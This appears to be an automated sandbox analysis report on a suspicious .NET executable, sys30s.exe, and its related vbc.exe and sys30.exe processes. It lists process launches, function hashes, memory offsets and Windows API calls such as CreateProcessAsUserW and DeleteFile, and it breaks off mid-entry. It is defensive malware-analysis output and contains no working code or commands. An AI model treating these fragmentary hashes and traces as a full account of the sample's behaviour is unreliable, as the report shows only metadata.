                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 3004 Parent PID: 2668

                                  General

                                  Start time:21:49:08
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 704 Parent PID: 3048

                                  General

                                  Start time:21:49:12
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 908 Parent PID: 704

                                  General

                                  Start time:21:49:14
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 1284 Parent PID: 3048

                                  General

                                  Start time:21:49:18
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2124 Parent PID: 1284

                                  General

                                  Start time:21:49:21
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Analysis Process: sys30s.exe PID: 2612 Parent PID: 3048

                                  General

                                  Start time:21:49:25
                                  Start date:14/09/2021
                                  Path:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\AppData\Local\Temp\sys30s.exe'
                                  Imagebase:0x870000
                                  File size:78336 bytes
                                  MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: vbc.exe PID: 2224 Parent PID: 2652 vbc.exeCOMMON

                                    Executed Functions

                                    Function 00383D88, Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: fC{l$fC{l$RO
                                    • API String ID: 0-2598762995
                                    • Opcode ID: 5af437a24a0cea0dc5ce54eca0944d5450fa79c05a235f20f4a343b69dfa592c
                                    • Instruction ID: 833b6687d964757e7f7fcc2f563a207f112a7dc0ed26b60b19ac19a35502c3ea
                                    • Opcode Fuzzy Hash: 5af437a24a0cea0dc5ce54eca0944d5450fa79c05a235f20f4a343b69dfa592c
                                    • Instruction Fuzzy Hash: 5132C174901228CFDB65DF68D848BADBBB2FF89305F1084EAD50AA7354DB359A81CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038BC70, Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |eO
                                    • API String ID: 0-1547930565
                                    • Opcode ID: 23750f9ca7d1c7272a84d06fe6d2f0d207484f96fcf02d576c224fc6ba37cee9
                                    • Instruction ID: 624566043d50ce05f9e02375b8064f37b4598ca610ca7e8cbc7838f29293f91c
                                    • Opcode Fuzzy Hash: 23750f9ca7d1c7272a84d06fe6d2f0d207484f96fcf02d576c224fc6ba37cee9
                                    • Instruction Fuzzy Hash: EEA1E774A04209DFCB45DFA8D990AADBBF2FF89304F20816AD519AB355DB31AD46CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 003824C0, Relevance: .5, Instructions: 460COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 77b2f464dccba1cc85be6279a271f0d97519d1352bb6dd2aeb901b6336e69fa3
                                    • Instruction ID: cf2e6cc2b20148f55f6bc866b406383c178ad2d9c0272f496e03ad3d792d2938
                                    • Opcode Fuzzy Hash: 77b2f464dccba1cc85be6279a271f0d97519d1352bb6dd2aeb901b6336e69fa3
                                    • Instruction Fuzzy Hash: 9C22F275A00218DFDB15DFA8C944F99BBB2FF48304F1580E9E609AB266CB31AD91DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00380B77, Relevance: .4, Instructions: 351COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ed9110677dc6a782a59536b6e63caf961d41d1f823894a93597fe9dc2b939141
                                    • Instruction ID: fbb492001bd6e1385908ce7680f8abc6d13753d190512426e46171ee9aad7b02
                                    • Opcode Fuzzy Hash: ed9110677dc6a782a59536b6e63caf961d41d1f823894a93597fe9dc2b939141
                                    • Instruction Fuzzy Hash: F3B1F3307093019BDB0AAB31DD5477F76AAAF80350F1589A9E916CB3DADF38CC4583A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038DB3F, Relevance: .2, Instructions: 191COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49e091f24f5ee8bfb50b3f07cd8b8854133525fb13ee72e67788285ea367a20d
                                    • Instruction ID: 5a496aaaac83c5841567e220f57b5f364216d16a452b98ac4c56c6c49a199b69
                                    • Opcode Fuzzy Hash: 49e091f24f5ee8bfb50b3f07cd8b8854133525fb13ee72e67788285ea367a20d
                                    • Instruction Fuzzy Hash: B9719C74E09244DFCB05EFA8E854AADBBF1EF8A301F1580AAD419A7391CB715D06CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038B12C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                    Download Yara Rule
                                    APIs
                                    • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0038E209
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: CopyFile
                                    • String ID: ^O
                                    • API String ID: 1304948518-89633577
                                    • Opcode ID: aba496005d57241076348bc66f61cd88085c514b8b689f9b9b2d4975bb098625
                                    • Instruction ID: 21506c223e40aeaeaf6bc82adf8ed0bba60c2d1518a4d2e23558cb28c5952408
                                    • Opcode Fuzzy Hash: aba496005d57241076348bc66f61cd88085c514b8b689f9b9b2d4975bb098625
                                    • Instruction Fuzzy Hash: EBC1E074E04218CFDB25DFA9C885B9EBBB1FF49304F1485A9E419A7351DB34AA85CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038345C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 0038B6AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: FolderPath
                                    • String ID: L^O
                                    • API String ID: 1514166925-1150976365
                                    • Opcode ID: e89824597f6c371506a31aa41a4f1f6e786cab78253b2caa6631545f0abffe66
                                    • Instruction ID: 26e1477c66f2c4e0a805fd7e9b60209604a89bd4017147e0e45306f5c1e95d9d
                                    • Opcode Fuzzy Hash: e89824597f6c371506a31aa41a4f1f6e786cab78253b2caa6631545f0abffe66
                                    • Instruction Fuzzy Hash: DD61CCB4D043198FDB21DFA9D884AADFBF1BF49304F20916AE419AB350D734A946CF44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038B534, Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 0038B6AD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: FolderPath
                                    • String ID:
                                    • API String ID: 1514166925-0
                                    • Opcode ID: 8ff7704c805abbba949ef4c17318046d569fe91e9ae45fbb756c86f135c80bda
                                    • Instruction ID: e31ef72d0f591a2e65da3bac9e7e81637166b1ce4cf75478b125076d69c78f79
                                    • Opcode Fuzzy Hash: 8ff7704c805abbba949ef4c17318046d569fe91e9ae45fbb756c86f135c80bda
                                    • Instruction Fuzzy Hash: 8361DEB4E04219CFDB21DFA9D984A9DFBF1BF49304F20916AE419AB350D734A946CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00383158, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: a70c35a9a4e06b05361e3cb486e0ffc4ffee68d9297ecb14f4367b3f4358f893
                                    • Instruction ID: b8b7b30078c0e9f7ec0fc8d21f352a3c43f240aa7a4c80c0d64ccc26016982be
                                    • Opcode Fuzzy Hash: a70c35a9a4e06b05361e3cb486e0ffc4ffee68d9297ecb14f4367b3f4358f893
                                    • Instruction Fuzzy Hash: 9331BBB4D052189FCB11DFA9D884AEEFBF5BB49314F14806AE414B7350D374AA45CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006107F4, Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 96e35b5e6550cf84e0544dd0854097cf93c70609239fcbb4cdc90419c8f787ea
                                    • Instruction ID: d9ca793268535c30691142a7eb8898322ed825ccd73a78ad26fc10a39f4f3968
                                    • Opcode Fuzzy Hash: 96e35b5e6550cf84e0544dd0854097cf93c70609239fcbb4cdc90419c8f787ea
                                    • Instruction Fuzzy Hash: 04217F3080E3849FDB42CBB4D8516DCBFB0AF07212F1980EAD4859B6A2D2750E95DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0011D295, Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518820484.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22de51a1f291079edcb48303dfc154c4a4f65464405fbb6a94425e85226be8d4
                                    • Instruction ID: de3fcd54a0a8bd05c20aafc83cdc561d5a4dbd25f281380294c89ac8dd8fa18d
                                    • Opcode Fuzzy Hash: 22de51a1f291079edcb48303dfc154c4a4f65464405fbb6a94425e85226be8d4
                                    • Instruction Fuzzy Hash: 9501DB7100C3409AD7248A25E884BA7FF98EF51724F19C46AEE255B286D375EC80C772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0011D294, Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518820484.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6199551623eb807e27ba25c17e0983ffdad5dd4d1eca0358a50e55d138dbbbd6
                                    • Instruction ID: 0799c3d40bbaecc2f8ba93f0cad36db77199aad51c11649b1ec3c7344174de4c
                                    • Opcode Fuzzy Hash: 6199551623eb807e27ba25c17e0983ffdad5dd4d1eca0358a50e55d138dbbbd6
                                    • Instruction Fuzzy Hash: ECF062714083409EE7148E15D884BA7FF98EB51724F28C46AED185B286C378AC84CBB2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610CE0, Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce6ea567266bb00be4791869bc5b5919c94bdbdb5869674285d684f79975a79c
                                    • Instruction ID: 7f36694ad77496536afd4d620a0c5933e92320a161c4eed68bdf9b0651bbe7ef
                                    • Opcode Fuzzy Hash: ce6ea567266bb00be4791869bc5b5919c94bdbdb5869674285d684f79975a79c
                                    • Instruction Fuzzy Hash: BCF0F030449244DFCF12CBA4D8049CDBFB0EF47321F1580DDE8812B322C6704995DB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610FA8, Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f20224b5c9d8684b386d75dbc87ce5962c8ec25982cb687dce766478ddecfe11
                                    • Instruction ID: e3a703e07082147b38cb0ab6e20ca60ff4d61a6783e9ce0e1ef32f6e1b2798fc
                                    • Opcode Fuzzy Hash: f20224b5c9d8684b386d75dbc87ce5962c8ec25982cb687dce766478ddecfe11
                                    • Instruction Fuzzy Hash: DEF04934909384DFDB52CBA4C855A98BFF0EF0A211F0A80EAD848DB362D6744945CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00611454, Relevance: .0, Instructions: 26COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0250d0fee067bb47eb1a4cbbf193046a38aa8ccd0c761f16f79e67d819b79287
                                    • Instruction ID: c808a55fe9afda889f8890c8321dfb78503e9afcc26e75b4fab7143d619f4df4
                                    • Opcode Fuzzy Hash: 0250d0fee067bb47eb1a4cbbf193046a38aa8ccd0c761f16f79e67d819b79287
                                    • Instruction Fuzzy Hash: AAF08C3080E384DFC7539BB488102AA7FB09B06202F1900EBD444D72A3E2380E44C762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610FC8, Relevance: .0, Instructions: 20COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63ad6c27c296cabf3be2822e206439565c441d1e837efc51945ea1f1b78c5ac6
                                    • Instruction ID: f64300de0cd811f87fb4ab8bd2b6811d9563d8793af860be862e5433a1c63bd0
                                    • Opcode Fuzzy Hash: 63ad6c27c296cabf3be2822e206439565c441d1e837efc51945ea1f1b78c5ac6
                                    • Instruction Fuzzy Hash: F6E0E534E00208EFCB40DFA9D545A9DBBF4EB48301F1180E9E80893320D6309A40CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006108A0, Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32066150a4583229ab0c9a24518596b498900e33fc09572b1277b9b2768851f7
                                    • Instruction ID: 11f6545bdc85071ff6a95b8e0eeb0ec4381b07ab609971e4165d5ed26af3241c
                                    • Opcode Fuzzy Hash: 32066150a4583229ab0c9a24518596b498900e33fc09572b1277b9b2768851f7
                                    • Instruction Fuzzy Hash: 36E04634904208EFCB40EFA4D8449ADBBB5FF49312F1080A8F90827320C731AEA0DB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610D00, Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32066150a4583229ab0c9a24518596b498900e33fc09572b1277b9b2768851f7
                                    • Instruction ID: 2a48d35d440e2bc056aa675d24f7240109daff1e67092405be88b3e83dac259f
                                    • Opcode Fuzzy Hash: 32066150a4583229ab0c9a24518596b498900e33fc09572b1277b9b2768851f7
                                    • Instruction Fuzzy Hash: B8E04F34900208EFCB00DF94D84499DBBB5FF49312F1080A4F90427320C731AE90DB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610068, Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bd15ffe5f6f918c7cd0865ca982b03212f37bd4fe596c8f54941ecb856f1a36d
                                    • Instruction ID: 7d2bf6b4e841899d9d847f3c5cd2e143617a6d83a098b2bf8c993871c07448bb
                                    • Opcode Fuzzy Hash: bd15ffe5f6f918c7cd0865ca982b03212f37bd4fe596c8f54941ecb856f1a36d
                                    • Instruction Fuzzy Hash: CFE0E230D01208EFCB44EFF899452ADBBB5AB08206F6140B9990893350EB359A90CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00611470, Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19ed11a342a293d0415295b4c02c44fbe63dd7416216d614ca092356c1cc34e2
                                    • Instruction ID: d952ecc10346108a883fabb1a247aa55ab9da3f5711dc083496d0db41c59bf9f
                                    • Opcode Fuzzy Hash: 19ed11a342a293d0415295b4c02c44fbe63dd7416216d614ca092356c1cc34e2
                                    • Instruction Fuzzy Hash: 8DE0E230805248EFCB54EBF899052AEBBF4EB05206F2000F9E90897360EB358B90DB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00610D88, Relevance: .0, Instructions: 14COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.519054569.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ada95fe1d7b81cbc457e4235a322338a4f02b8d250c561e2271d95302b893d0f
                                    • Instruction ID: 4a33d49a792e7adde0cedb4c51a15441466e8257893c1b839e37f25c2e98f66c
                                    • Opcode Fuzzy Hash: ada95fe1d7b81cbc457e4235a322338a4f02b8d250c561e2271d95302b893d0f
                                    • Instruction Fuzzy Hash: CCD0C934806208DBD714EBE4A9006AEB36DDF4120AF1001A8940913750DB725A94C695
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0038C708, Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4403afef22406ce6c49df8353f03d3ab9fab3b7433ccc1e51991be71cf711ebb
                                    • Instruction ID: 36b88582eea63650c2f2e34e00b231bf64851519e08d5b67c0b430b353d47440
                                    • Opcode Fuzzy Hash: 4403afef22406ce6c49df8353f03d3ab9fab3b7433ccc1e51991be71cf711ebb
                                    • Instruction Fuzzy Hash: E931B4B1D006188BEB18CF6BC94079EFAF7AFC8300F14C0AAD818AB254DB7109468F50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038462A, Relevance: .1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db72a7d7069bdccb092ccc4b32638571fa54e1f402bc9a9d80710a973d4871ef
                                    • Instruction ID: 080e88c20ea2a163b79772214a7a0d9c4e3b44dadf092fd1f6983d00cf495312
                                    • Opcode Fuzzy Hash: db72a7d7069bdccb092ccc4b32638571fa54e1f402bc9a9d80710a973d4871ef
                                    • Instruction Fuzzy Hash: 0A21C071D046188BEB08CFABC94429EFBF3AFC9300F14C1AAD418AB265EB354902CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00385CA8, Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aa722b4f84438c7a6f7ef39ebc1e558583620bc13498c079ed7bf541efd11cea
                                    • Instruction ID: 26c0ff64f84a0f2e5325f6924ebb1da5e3b5e6acad8bdef09982cfdb22161565
                                    • Opcode Fuzzy Hash: aa722b4f84438c7a6f7ef39ebc1e558583620bc13498c079ed7bf541efd11cea
                                    • Instruction Fuzzy Hash: 9521F971E016189BEB18CF6BD94479DFAF7AFC8300F14C1BAD808A7265EB3149458F40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00384638, Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.518906756.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8485bb47093f666504373ff3a7f1b0a0aa37b316bc091f64cf7c0a499f92a26d
                                    • Instruction ID: 0f7257651407fa7c5740c8accc129faf40cfc8ee2672bd8f651d0bcc911a8424
                                    • Opcode Fuzzy Hash: 8485bb47093f666504373ff3a7f1b0a0aa37b316bc091f64cf7c0a499f92a26d
                                    • Instruction Fuzzy Hash: D7219771D006198BEB08DFABC94429EFAF7AFC9300F14C17AD419AB265EB355502CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: sys30.exe PID: 3048 Parent PID: 1764 sys30.exeCOMMON

                                    Executed Functions

                                    Function 00C26618, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 250processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C26804
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: CreateProcessUser
                                    • String ID: +S?
                                    • API String ID: 2217836671-2156307688
                                    • Opcode ID: d7bc261ef8275c5272768eacc729fafc8d289eb0f4becc862efb9d43340761ca
                                    • Instruction ID: 3c9d0320652ed8f85ba29d480870f7585f5b8d2505bb5527e111dc14940e3115
                                    • Opcode Fuzzy Hash: d7bc261ef8275c5272768eacc729fafc8d289eb0f4becc862efb9d43340761ca
                                    • Instruction Fuzzy Hash: 0C91BD74D0426D8FCF21CFA4D880BEEBBB1AF49304F1590AAE548B7250DB709A85CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038345C, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 0038B6AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: FolderPath
                                    • String ID: +S?$+S?$L^T
                                    • API String ID: 1514166925-1960333213
                                    • Opcode ID: 22912c9ce356d0de1dcba7fdc5e6c39dc03db234a1b6fce2202d0b9e729177e6
                                    • Instruction ID: 5f7fa7d51208922866f6f8f639c187390efe717de9559cd5c7ef6828a854c741
                                    • Opcode Fuzzy Hash: 22912c9ce356d0de1dcba7fdc5e6c39dc03db234a1b6fce2202d0b9e729177e6
                                    • Instruction Fuzzy Hash: 9761CCB4D043198FDB21DFA9D884AADFBF1BF49304F20916AE819A7350E734A946CF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038B534, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 0038B6AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: FolderPath
                                    • String ID: +S?$+S?
                                    • API String ID: 1514166925-1463285784
                                    • Opcode ID: fe95585069c2300303235d8fda0fa089c849569e97a160c0a39423a152b430de
                                    • Instruction ID: 587faa75730913de891085d73613766f57149fd2d1d241de71ad63270df9f2df
                                    • Opcode Fuzzy Hash: fe95585069c2300303235d8fda0fa089c849569e97a160c0a39423a152b430de
                                    • Instruction Fuzzy Hash: 8351DDB4D04219CFDB21DFA8D884A9DFBF1BF49304F20916AE819A7350DB34A986CF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0038B548, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 0038B6AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.683894813.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                    Similarity
                                    • API ID: FolderPath
                                    • String ID: +S?$+S?
                                    • API String ID: 1514166925-1463285784
                                    • Opcode ID: 0eeeabfd2d0f0690bc868f44b222681e2fc7a0d8ee64edb02834a0406dc01721
                                    • Instruction ID: ab8c840e6aae2959685aa7c48932ee094590e60f3175bbdf260709a17ecc0939
                                    • Opcode Fuzzy Hash: 0eeeabfd2d0f0690bc868f44b222681e2fc7a0d8ee64edb02834a0406dc01721
                                    • Instruction Fuzzy Hash: 2351BAB4D04219CFDB21DFA8D884A9DFBB1BF49304F20916AE819A7250D734A986CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00C2660D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 253processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C26804
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.688589259.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                    Similarity
                                    • API ID: CreateProcessUser
                                    • String ID: +S?
                                    • API String ID: 2217836671-2156307688
                                    • Opcode ID: 9a0929838e5732637a8369771d1fc8a3c357111caea6fde86d718974d447c081
